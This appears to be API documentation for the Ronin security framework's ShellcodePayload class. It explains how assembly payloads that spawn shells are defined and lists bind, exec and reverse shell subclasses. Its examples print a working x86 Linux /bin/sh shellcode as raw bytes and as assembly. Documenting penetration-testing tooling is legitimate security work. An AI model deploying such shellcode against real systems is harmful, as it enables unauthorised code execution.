Class: Ronin::Payloads::ShellcodePayload

Inherits:

ASMPayload

• Object
• Payload
• BinaryPayload
• ASMPayload
• Ronin::Payloads::ShellcodePayload

Defined in:

lib/ronin/payloads/shellcode_payload.rb

Overview

A Payload class that represents payloads written in assembly which spawn shells or run commands.

Example

#!/usr/bin/env -S ronin-payload build -f
require 'ronin/payloads/shellcode_payload'

module Ronin
  module Payloads
    class LinuxX86BinSh < ShellcodePayload

      register 'shellcode/linux/x86/bin_sh'

      summary 'x86 Linux /bin/sh shellcode'
      description <<~EOS
        Shellcode that spawns a local /bin/sh shell
      EOS

      arch :x86
      os :linux

      def build
        @payload = "1\xc0Ph//shh/bin\x89\xdcPS\x89\xcc1\xd2\xcd\x0b"
      end
    end
  end
end

Pure-ruby shellcode:

#!/usr/bin/env -S ronin-payload build -f
require 'ronin/payloads/shellcode_payload'

module Ronin
  module Payloads
    class LinuxX86BinSh < ShellcodePayload

      register 'shellcode/linux/x86/bin_sh'

      summary 'x86 Linux /bin/sh shellcode'
      description <<~EOS
        Shellcode that spawns a local /bin/sh shell
      EOS

      arch :x86
      os :linux

      def build
        shellcode do
          xor   eax, eax
          push  eax
          push  0x68732f2f
          push  0x6e69622f
          mov   esp, ebx
          push  eax
          push  ebx
          mov   esp, ecx
          xor   edx, edx
          int   0xb
        end
      end

    end
  end
end

Direct Known Subclasses

Ronin::Payloads::Shellcode::BindShellPayload, Ronin::Payloads::Shellcode::ExecShellPayload, Ronin::Payloads::Shellcode::ReverseShellPayload

Instance Attribute Summary

Attributes inherited from Payload

#encoders, #payload

Class Method Summary

• .payload_type ⇒ Symbol private

  Returns the type or kind of payload.

Instance Method Summary

• #shellcode(define = {}) { ... } ⇒ String

  Assembles shellcode and sets the @payload instance variable.

Methods inherited from ASMPayload

#assemble, assembler

Methods included from Metadata::OS

included, #os, #os_version

Methods included from Metadata::Arch

#arch, included

Methods inherited from Payload

#build, #built?, #built_payload, #bytesize, #cleanup, #encode_payload, #encoded_payload, encoder_class, #initialize, #length, #perform_build, #perform_cleanup, #perform_postlaunch, #perform_prelaunch, #perform_validate, #postlaunch, #prelaunch, #rebuild_payload, #reencode_payload, register, #to_s, #validate

Constructor Details

This class inherits a constructor from Ronin::Payloads::Payload

Class Method Details

.payload_type ⇒ Symbol

This method is part of a private API. You should avoid using this method if possible, as it may be removed or be changed in the future.

Note:

This is used internally to map an payload class to a printable type.

Returns the type or kind of payload.

Returns:

• (Symbol)

# File 'lib/ronin/payloads/shellcode_payload.rb', line 108

def self.payload_type
  :shellcode
end

Instance Method Details

#shellcode(define = {}) { ... } ⇒ String

Assembles shellcode and sets the @payload instance variable.

Parameters:

• define (Hash{Symbol => Object}) (defaults to: {}) —

  Constants to define in the shellcode.

Yields:

• [] The given block represents the instructions of the shellcode.

Returns:

• (String) —

  The assembled shellcode.

# File 'lib/ronin/payloads/shellcode_payload.rb', line 124

def shellcode(define={},&block)
  @payload = Code::ASM::Shellcode.new(
    arch:   arch,
    os:     os,
    define: define,
    &block
  ).assemble
end